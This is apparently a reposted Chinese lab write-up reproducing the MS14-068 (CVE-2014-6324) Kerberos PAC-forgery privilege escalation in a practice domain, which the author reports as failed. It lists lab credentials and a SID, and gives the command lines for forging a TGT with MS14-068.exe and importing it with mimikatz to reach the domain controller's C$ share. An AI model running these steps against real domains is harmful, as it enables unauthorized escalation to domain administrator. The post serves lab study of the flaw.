漏洞原理
在kerberos协议中,Client去访问Server,需要知道是否具有访问权限。所以微软在KRB_AS_REP中的TGT中增加了Client的PAC(特权属性证书),也就是Client的权限,包括Client的User的SID、Group的SID。ms14-068 漏洞就是经过身份验证的Client在TGT中伪造高权限的PAC。该漏洞允许任何一个域普通用户,将自己提升至域管理员权限。
环境搭建
该漏洞复现环境是红日二靶场搭建的,拓扑如下
主机名字 |
IP |
DC.de1ay.com | 10.10.10.10(内网) |
PC.de1ay.com | 10.10.10.20(内网)/192.168.111.201(外网) |
漏洞复现
该漏洞需要使用到以下信息:
-
域用户名(mssql)
-
域用户密码(1qaz@WSX)
-
域名(de1ay.com)
-
域用户SID(S-1-5-21-2756371121-2868759905-3853650604-2103)
-
域控地址(10.10.10.10)
信息收集
查看域名
ipconfig /all
查看域用户SID
whoami /all
查看域控ip
net time /domain #查看域控名字
ping DC.de1ay.com #ping域控就能得到域控ip地址
首先查看有无ipc连接,发现没有ipc连接
dir \10.10.10.10c$
在内网机器中运行运行以下命令生成TGT票据,需要MS14-068的EXP,在github上就能很容易找到。
MS14-068.exe -u mssql@de1ay.com -s S-1-5-21-2756371121-2868759905-3853650604-2103 -d 10.10.10.10 -p 1qaz@WSX
将生成的TGT票据移动到mimikatz中进行票据的导入,进行票据攻击
mimikatz.exe
kerberos::purge
kerberos::ptc TGT_mssql@de1ay.com.ccache
既然票据传递攻击成功了,那么我们就可以对域控的c盘映射到本地中,进行任意的查看,我这里为了方便就直接查看c盘。
但,这里我用mssql权限的时候,一直攻击失败,不知道是什么原因,需要继续研究,希望有知道的朋友可以留言。
dir \10.10.10.10c$
- End -
原文始发于微信公众号(NS Demon团队):【漏洞复现】CVE-2014-6324(MS14-068)域内权限提升漏洞(失败笔记)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论